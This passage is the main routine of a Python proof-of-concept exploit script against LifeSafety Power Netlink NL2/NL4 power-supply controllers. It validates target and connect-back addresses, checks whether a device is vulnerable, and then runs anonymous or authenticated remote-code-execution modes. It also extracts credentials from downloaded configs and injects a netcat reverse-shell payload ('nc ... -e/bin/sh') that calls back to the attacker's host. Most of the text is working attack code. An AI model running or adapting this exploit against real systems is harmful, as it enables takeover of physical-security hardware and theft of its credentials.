if int(self.PORT) < 1 or int(self.PORT) > 65535:
return False
else:
return True
# Check if HOST is valid
def Host(self,HOST):
self.HOST = HOST
try:
# Check valid IP
socket.inet_aton(self.HOST) # Will generate exeption if we try with DNS or invalid IP
# Now we check if it is correct typed IP
if self.CheckIP(self.HOST):
return self.HOST
else:
return False
except socket.error as e:
# Else check valid DNS name, and use the IP address
try:
self.HOST = socket.gethostbyname(self.HOST)
return self.HOST
except socket.error as e:
return False
if __name__ == '__main__':
#
# Help, info and pre-defined values
#
INFO = '[LifeSystem Power Netlink NL2/NL4 PoC (2018 bashis <mcw noemail eu>)]\n'
HTTP = "http"
HTTPS = "https"
proto = HTTP
verbose = False
raw_request = True
rhost = '192.168.57.20' # Default Remote HOST
rport = '80' # Default Remote PORT
lhost = '192.168.57.1' # Default Local HOST
lport = '1337' # Default Local PORT
creds = 'admin:admin' # creds = 'user:pass'
Cookie = ""
#
# Try to parse all arguments
#
try:
arg_parser = argparse.ArgumentParser(
prog=sys.argv[0],
description=('[*] '+ INFO +' [*]'))
arg_parser.add_argument('--rhost', required=False, help='Remote Target Address (IP/FQDN) [Default: '+ rhost +']')
arg_parser.add_argument('--rport', required=False, help='Remote Target HTTP/HTTPS Port [Default: '+ rport +']')
arg_parser.add_argument('--lhost', required=False, help='Connect Back Address (IP/FQDN) [Default: '+ lhost +']')
arg_parser.add_argument('--lport', required=False, help='Connect Back Port [Default: '+ lport + ']')
arg_parser.add_argument('--get_config', required=False, default=False, action='store_true', help='Try download config and extract credentials (v8.x)')
arg_parser.add_argument('--v715_rce', required=False, default=False, action='store_true', help='Anonymous RCE for Netlink v7.15 (w/ mongoose web server)')
arg_parser.add_argument('--v8_hash_rce', required=False, default=False, action='store_true', help='Anonymous RCE for Netlink v8.x (w/ Apache web server)')
arg_parser.add_argument('--v8_uri_rce', required=False, default=False, action='store_true', help='Anonymous RCE for Netlink v8.x (w/ Apache web server)')
arg_parser.add_argument('--auth_rce', required=False, default=False, action='store_true', help='Auth RCE for Netlink, add "--get_config" for Anonymous')
if creds:
arg_parser.add_argument('--auth', required=False, help='Basic Authentication [Default: '+ creds + ']')
arg_parser.add_argument('--https', required=False, default=False, action='store_true', help='Use HTTPS for remote connection [Default: HTTP]')
arg_parser.add_argument('-v','--verbose', required=False, default=False, action='store_true', help='Verbose mode [Default: False]')
args = arg_parser.parse_args()
except Exception as e:
print INFO,"\nError: %s\n" % str(e)
sys.exit(1)
# We want at least one argument, so print out help
if len(sys.argv) == 1:
arg_parser.parse_args(['-h'])
print "\n[*]",INFO
if args.verbose:
verbose = args.verbose
#
# Check validity, update if needed, of provided options
#
if args.https:
proto = HTTPS
if not args.rport:
rport = '443'
if creds and args.auth:
creds = args.auth
if args.rport:
rport = args.rport
if args.rhost:
rhost = args.rhost
if args.lport:
lport = args.lport
if args.lhost:
lhost = args.lhost
# Check if RPORT is valid
if not Validate(verbose).Port(rport):
print "[!] Invalid RPORT - Choose between 1 and 65535"
sys.exit(1)
# Check if RHOST is valid IP or FQDN, get IP back
rhost = Validate(verbose).Host(rhost)
if not rhost:
print "[!] Invalid RHOST"
sys.exit(1)
# Check if LHOST is valid IP or FQDN, get IP back
lhost = Validate(verbose).Host(lhost)
if not lhost:
print "[!] Invalid LHOST"
sys.exit(1)
# Check if RHOST is valid IP or FQDN, get IP back
rhost = Validate(verbose).Host(rhost)
if not rhost:
print "[!] Invalid RHOST"
sys.exit(1)
#
# Validation done, start print out stuff to the user
#
if args.https:
print "[i] HTTPS / SSL Mode Selected"
print "[i] Remote target IP:",rhost
print "[i] Remote target PORT:",rport
print "[i] Local target IP:",lhost
print "[i] Local target PORT:",lport
rhost = rhost + ':' + rport
headers = {
'Content-Type' : 'application/x-www-form-urlencoded',
'Connection':' close',
'Cookie':' right=3; loginname=admin; Accept=yes; hash_key=kwitfbcuvnnxdjyp; viewnavi=yes',
'User-Agent':'Chrome/5.0'
}
RCE = "$(nc${IFS}LHOST${IFS}LPORT${IFS}-e/bin/sh)"
RCE = RCE.replace("LHOST",lhost).replace("LPORT",lport)
try:
#
# Check if remote is Netlink, and if running 'Apache' or 'mongoose' web server.
# (If remote are not Netlink, this function will tell and exit)
#
# True == Apache Web Server (v8.x), False == Mongoose Web Server (v7.x)
#
Netlink_Version = LifeSafetyPower(rhost,proto,verbose,creds,raw_request).Verify_Target(headers, lhost, lport)
#
# Check if remote target is vulnerable
#
Vulnerable = LifeSafetyPower(rhost,proto,verbose,creds,raw_request).Check_Vulnerable(headers, lhost, lport, Netlink_Version)
if Vulnerable:
print "[i] Remote target is vulnerable"
#
# Try get version of remote target
#
Version = LifeSafetyPower(rhost,proto,verbose,creds,raw_request).Get_Version(headers, lhost, lport)
if args.v8_uri_rce:
if Netlink_Version:
result = LifeSafetyPower(rhost,proto,verbose,creds,raw_request).URI_Decoder_RCE(headers, lhost, lport)
else:
print "[!] v8_uri_rce: Older version has the vulnerability, but not implemented"
sys.exit(1)
#
# Anonymous: Execute RCE due to unsanitized user input direct to system() call
#
if args.v8_hash_rce:
if Netlink_Version:
result = LifeSafetyPower(rhost,proto,verbose,creds,raw_request).v8_hash_rce(headers, lhost, lport)
else:
print "[!] v8_hash_rce: Not supported with Mongoose Web Server"
sys.exit(1)
#
# Anonymous: Execute RCE via stack overflow
#
if args.v715_rce:
if not Netlink_Version:
result = LifeSafetyPower(rhost,proto,verbose,creds,raw_request).v715_rce(headers, lhost, lport)
else:
print "[!] v715_rce: Not supported with Apache Web Server"
sys.exit(1)
if args.get_config:
#
# Anonymous: Try to get all config and extract username/password hash from remote device
#
if Netlink_Version:
creds = LifeSafetyPower(rhost,proto,verbose,creds,raw_request).Get_allcfg(headers)
if creds == False:
print "[!] Extracted Credentials Failed"
else:
print "[!] get_config: Not supported with Mongoose Web Server"
sys.exit(1)
if args.auth_rce:
csrftoken = ""
response = ""
#
# Authenticated: Login, Add and execute RCE
# Anonymous: Combine with '--get_config'
#
Cookie, csrftoken = LifeSafetyPower(rhost,proto,verbose,creds,raw_request).Login(csrftoken,response,headers,Cookie)
Cookie, csrftoken = LifeSafetyPower(rhost,proto,verbose,creds,raw_request).Add_RCE_msmtp(csrftoken,response,headers,Cookie,RCE)
#
# Authenticated: Login, and remove RCE
# Anonymous: Combine with '--get_config'
#
Cookie, csrftoken = LifeSafetyPower(rhost,proto,verbose,creds,raw_request).Login(csrftoken,response,headers,Cookie)
Cookie, csrftoken = LifeSafetyPower(rhost,proto,verbose,creds,raw_request).Del_RCE_msmtp(csrftoken,response,headers,Cookie)
else:
print "[i] Remote target not vulnerable"
except Exception as e:
print "[!] Detect of target failed ({})".format(e)
sys.exit(1)
print "\n[*] All done...\n"
sys.exit(0)
